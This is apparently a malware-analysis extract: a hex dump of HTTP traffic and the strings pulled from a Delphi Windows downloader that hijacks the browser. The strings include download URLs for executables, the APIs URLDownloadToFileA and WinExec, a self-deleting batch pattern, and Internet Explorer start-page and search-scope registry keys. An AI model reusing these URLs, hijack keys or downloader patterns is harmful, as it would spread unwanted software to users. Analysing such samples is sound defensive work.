0x000000d0 (00208)   2d416c69 76650d0a 0d0a2d41 6c697665   -Alive....-Alive
0x000000e0 (00224)   0d0a0d0a 0a6e3a20 4b656570 2d416c69   .....n: Keep-Ali
0x000000f0 (00240)   76650d0a 0d0a                         ve....


Strings
\
.

Abstract Error?Access violation at address %p in module '%s'. %s of address %p
A call to an OS function failed
Ancestor for '%s' not found
Application Error1Format '%s' invalid or incompatible with argument
April
Assertion failed
August
Cannot assign a %s to a %s
Cannot create file %s
Cannot open file %s$''%s'' is not a valid component name
Class %s not found%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Control-C hit
December
Division by zero
DVCLAL
Error creating variant array
Error reading %s%s%s: %s
Exception in safecall method
External exception %x
Failed to get data for '%s'
Failed to set data for '%s'
February
File access denied
File not found
Floating point division by zero
Floating point overflow
Floating point underflow
Friday
Integer overflow Invalid floating point operation
Interface not supported
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid data type for '%s' List capacity out of bounds (%d)
Invalid filename
Invalid numeric input
Invalid pointer operation
Invalid property path
Invalid property value
Invalid variant operation"Variant method calls not supported
Invalid variant type conversion
I/O error %d
January
jjjj
July
June
List count out of bounds (%d)
List index out of bounds (%d)+Out of memory while expanding memory stream
MAINICON(
March
Monday
No argument for format '%s'
November
October
Out of memory
PACKAGEINFO
Privileged instruction%Exception %s in module %s at %p.
Property is read-only
Property %s does not exist
Range check error
Read
Read beyond end of file	Disk full
Saturday
	September
!'%s' is not a valid integer value
%s%s
%s.Seek not implemented$Operation not allowed on sorted list
%s (%s, line %d)
Stack overflow
Stream read error
Stream write error
Sunday
System Error.  Code: %d.
Thursday
Too many open files
Tuesday	Wednesday
Variant is not an array!Variant array index out of bounds
Write
                                                                
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
0 0(0,0004080<0@0D0H0\0|0
0!0%0)0-0105090=0A0E0I0M0Q0U0Y0]0a0
0!0%0)0-0105090=0A0E0I0M0Q0U0Y0]0a0e0i0m0
"0&0,00050<0B0J0U0
0#0)030E0Y0a0m0y0
,00040
0&0.060>0F0W0b0j0r0z0
0(0@0L0\0|0
00151T1e1
0 1$1(1@1L1P1l1t1x1|1
0123456789ABCDEF
0#1Y1x1
030B0R0Z0o0w0
; ;$;(;,;0;4;8;<;@;D;H;L;P;h;
: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
: :(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:x:
< <$<(<,<0<4<8<<<H<T<h<p<t<x<|<
? ?$?(?,?0?4?8?<?@?P?p?x?|?
= =$=(=,=0=4=B=T=
> >$>(>,>0>4>H>h>p>t>x>|>
<$<(<0<4<<<@<H<L<T<X<`<d<l<p<x<|<
060D0H0d0l0p0t0x0|0
> >,>0>8><>@>D>H>L>P>T>X>\>`>d>h>l>p>t>x>|>
-090H0
0F0U0d0
>(?0?;?g?|?
0N1`1g1
? ?0?O?p?
0T1p1'2
?!?%?)?-?1?^?
1(1,1014181<1@1D1H1L1P1T1X1\1`1d1h1l1p1t1x1|1
1&1.161>1F1N1V1^1f1n1v1~1
1+171D1V1\1|1
1'191M1Q1U1Y1]1a1e1i1m1q1n2
1(1D1\1m1w1
1;1E1O1W1]1k1
1;1G1O1
1	2n2w2
141<1@1D1H1L1P1T1X1\1t1
?-?1?5?9?=?A?{?
:%:):-:1:5:9:=:A:E:I:
>!>%>)>->1>5>9>=>u>
2 2(20282@2H2P2X2`2h2p2x2
2 2'2,222E2N2l2r2z2
222<2I2X2`2h2p2x2
2&2.262>2F2N2V2^2f2n2v2~2
2,2:2S2
2(2H2P2T2X2\2`2d2h2l2p2
242<2@2D2H2L2P2T2X2\2l2
262=2p3}3
262F2Q2W2_2d2
2C3O3V3`3j3
<2<c<r<
2H4L4P4
2J2N2R2V2Z2^2b2f2j2n2r2v2z2~2
32393L3d3
3 3$3<3\3d3h3l3p3t3x3|3
3'333@3R3
3<3D3H3L3P3T3X3\3`3d3t3
3&3R3Z3b3j3r3z3
3>3V3z3
3$434G4
3$4+4s5
:3;m;`<
3Messages
4 4$4(4,4044484<4L4l4t4x4|4
4"4*474C4P4b4
4#4A4W4n4
4,4C4d4q4~4
4(4H4P4T4X4\4`4d4h4l4p4
4.575E5
; ;(;,;4;8;@;D;L;P;X;\;d;h;p;t;|;
:#:(:4:9:(;O;
:$:,:4:<:D:L:T:\:d:l:t:
4F4p4~4
4I4Q4Y4a4i4
4u4y4}4
5%5-53595@5J5
5 5(5,5054585<5@5D5H5
5 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|5
5 5$5(5,5054585<5H5h5p5t5x5|5
5 5$5(5g6
5,5>5K5W5d5v5~5
5)5F5S5`5x506
=%=/=5=?=E=O=Z=d=o=y=
6 6$6`6
6 6$6(6,6064686<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6|6
6&6.666>6F6N6V6^6f6n6v6~6
6%6)6<6H6L6X6\6d6h6l6p6t6x6|6
666;6k6
676C6K6
?+?6?I?V?
75797=7A7E7I7M7Q7U7Y7]7a7e7i7m7q7u7y7}7
7&7.767>7F7N7V7^7f7n7
7%7H7T7X7h7p7t7x7|7
7$8V8p8
?+?7?D?V?^?f?n?v?~?
7Project1
808>8B8T8m8x8
8%8*80858;8B8H8M8S8X8^8e8k8u8~8
8$8,848<8D8L8T8\8d8l8t8|8
8&9:9B9X9p9~9
8 9D9^9n9s9
8-9M9m9
<$<8<E<P<w<
8I9J:}:
8N:f:k:w:
8Registry
9$9,949<9D9L9T9\9d9l9t9|9
9 9$9(9,9094989<9@9D9H9L9P9T9X9h9y9}9
:#:.:9:A:K:U:_:u:{:
9f:m:'<6<f<k<}<
<9<]<i<
advapi32.dll
<A<N<\<j<
a-zm-157391-v5.exe
<B<K<}<
>'>B>|>O?
<B=O=b=h=|=
Boolean
=#=-=c=
<;<?<C<G<K<O<S<W<[<_<c<g<k<o<s<w<{<
>??C?G?K?O?S?W?[?_?c?g?k?s?
CharNextA
Classes
^Classes
CloseHandle
CompareStringA
CreateDirectoryA
CreateEventA
CreateFileA
CreateMutexA
CreateProcessA
C<"u1S
CVariants
cyiesetup.exe
DefaultScope
del %0
DeleteCriticalSection
DeleteFileA
DESKTOP
= =$=(=,=<=\=d=h=l=p=t=x=|=
;<;D;H;L;P;T;X;\;`;d;x;
DisplayName
dy46883223658.exe
EAbstractError
EAccessViolation
EAssertionFailed
EClassNotFound
EComponentError0
	EControlC
EConvertError
EDivByZero
	EExternal
EExternalException
EFCreateError
EFilerError
EFOpenError
EHeapException
EInOutErrorxl@
	EIntError
EIntfCastError
EIntOverflow
EInvalidCast
EInvalidOp
EInvalidPointer
EListError
EMathError
EnterCriticalSection
EnumCalendarInfoA
EOSError
EOutOfMemory
	EOverflow
EPrivilege
ERangeError8n@
EReadError
ERegistryException
ESafecallException
EStackOverflow
EStreamError
EStringListError
EUnderflow
EVariantError
EWriteError
~ExC[)
	Exceptionhk@
ExitProcess
EZeroDivide
<&<><F<
=F>b>r>
FileTimeToDosDateTime
FileTimeToLocalFileTime
FindClose
FindFirstFileA
FormatMessageA
=.=>=F=P=\=f=m=w=~=
FPUMaskValue
FreeLibrary
GetACP
GetCommandLineA
GetCPInfo
GetCurrentThreadId
GetDiskFreeSpaceA
GetDiskFreeSpaceExA
GetFileAttributesA
GetFileSize
GetFileType
GetKeyboardType
GetLastError
GetLocaleInfoA
GetLongPathNameA
GetModuleFileNameA
GetModuleHandleA
GetProcAddress
GetStartupInfoA
GetStdHandle
GetStringTypeExA
GetSystemMetrics
GetThreadLocale
GetTickCount
GetVersionExA
GetWindowsDirectoryA
GlobalAlloc
GlobalFree
GlobalHandle
GlobalLock
GlobalReAlloc
GlobalUnlock
;';-;G;N;X;b;l;x;
 goto try
>$>;>G>O>Y>d>l>q>
:G;Z;l;p;t;x;|;
>(>:>@>`>h>l>p>t>x>|>
Ht3Ht[
Ht Ht.
http://114.215.104.141/hzsoft/setup_2949-14598.exe
http://client-b.jtdichan.com/packages/g_wz/default2/a-zm-157391-v5.exe
http://dls.oss-cn-hangzhou.aliyuncs.com/cyiesetup.exe
http://dls.oss-cn-hangzhou.aliyuncs.com/setup_2949-14598.exe
http://down.xiaoxinrili.com/hezi/jm/setup_t10303.exe
http://soft.doyo.cn/soft/dy46883223658.exe
http://www.9365.info
http://www.baidu.com/baidu?tn=flstudios_cb&word={searchTerms}&cl=3&ie=utf-8
=#>=>h>_?u?
hzsoft
hzsoft\a-zm-157391-v5.exe
hzsoft\cyiesetup.exe
hzsoft\dy46883223658.exe
hzsoft\setup_2949-14598.exe
hzsoft\setup_t10303.exe
.idata
>;>I>d>m>
if exist "
IFoxInstall-y-c203945859-run-s-x.exe
IInterface
INFNAN
IniFiles
InitializeCriticalSection
Int64Op
Integer
InterlockedDecrement
InterlockedIncrement
=i?q?z?
IStringsAdapter
kernel32.dll
KWindows
=_>l>~>
LeaveCriticalSection
LoadLibraryExA
LoadStringA
LocalAlloc
LocalFree
lstrcpynA
lstrlenA
<,<L<T<X<\<`<d<h<l<p<t<
m/d/yy
MessageBoxA
mmmm d, yyyy
:mm:ss
MultiByteToWideChar
::<N<f<m<H=T=h=p=t=x=|=
oleaut32.dll
.Owner
P.reloc
Program Files\Internet Explorer\iexplore.exe"
P.rsrc
=P=T=X=\=`=d=
= =p=w=
QQQQQ3
QQQQQQ3
QQQQQQQ3
QQQQQQQSV
QQQQQQSVW3
QQQQQSVW
QQQQS3
QQQQSV
QTypInfo
Q<"u8S
RaiseException
.rdata
ReadFile
RealOp
RegCloseKey
RegCreateKeyExA
RegFlushKey
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
ReleaseMutex
ResetEvent
rksjudy.bat
rksjudyrksjudyb
?:?R?[?o?}?
"RTLConsts
RtlUnwind
Runtime error     at 00000000
=)=S>`>
sActiveX
SafeArrayCreate
SafeArrayGetElement
SafeArrayGetLBound
SafeArrayGetUBound
SafeArrayPtrOfIndex
SafeArrayPutElement
SafeArrayRedim
Sd]_^[
SetEndOfFile
SetEvent
SetFilePointer
setup_2949-14598.exe
setup_open_188.exe
setup_t10303.exe
setupX_054.exe
*ShellAPI
Software\Borland\Delphi\Locales
SOFTWARE\Borland\Delphi\RTL
Software\Borland\Locales
SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
Software\Microsoft\Internet Explorer
Software\Microsoft\Internet explorer\Main
Software\Microsoft\Internet Explorer\SearchScopes
Software\Microsoft\Internet Explorer\SearchScopes\baidu
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\SHELL FOLDERS
Start Page
StringP
Strings
S$_^[Y]
SysAllocStringLen
SysConst
SysFreeString
SysInit
SysReAllocStringLen
System
SysUtils
<*t"<0r=<9w9i
TBoundArray
TCollection
TComponent
TComponent\
TComponentName
TCustomMemoryStream
TCustomVariantType
	TErrorRec
TExceptRec
TFiler
TFileStream8
THandleStream
This program must be run under Win32
t@h`Z@
TInterfacedObject
TlHelp32
TlsGetValue
TlsSetValue
TMemoryStream
$TMultiReadExclusiveWriteSynchronizer
TObject
TPersistent
TPropFixup
TPropIntfFixup
TReader
	TRegGroup
TRegGroups
	TRegistryS
TStreamL
TStringItem
TStringList
TStringListl	A
TStrings
TThreadList
TThreadLocalCounter
TWriter
unersqa.exe
UnhandledExceptionFilter
unotcvb.exe
URLDownloadToFileA
UrlMon
URLMON.DLL
user32.dll
UTypes
=U=Y=]=a=e=i=m=q=u=y=}=
Variant
VariantChangeTypeEx
VariantClear
VariantCopy
VariantCopyInd
VariantInit
Variants
$VarUtils
Version
VirtualAlloc
VirtualFree
VirtualQuery
WaitForSingleObject
WideCharToMultiByte
WinExec
?WinInet
WinSock
WriteFile
YStrUtils
_^[YY]
$YZ]_^[
YZ]_^[
YZXtm1
(Z]_^[
$Z]_^[
ZTUWVSPRTj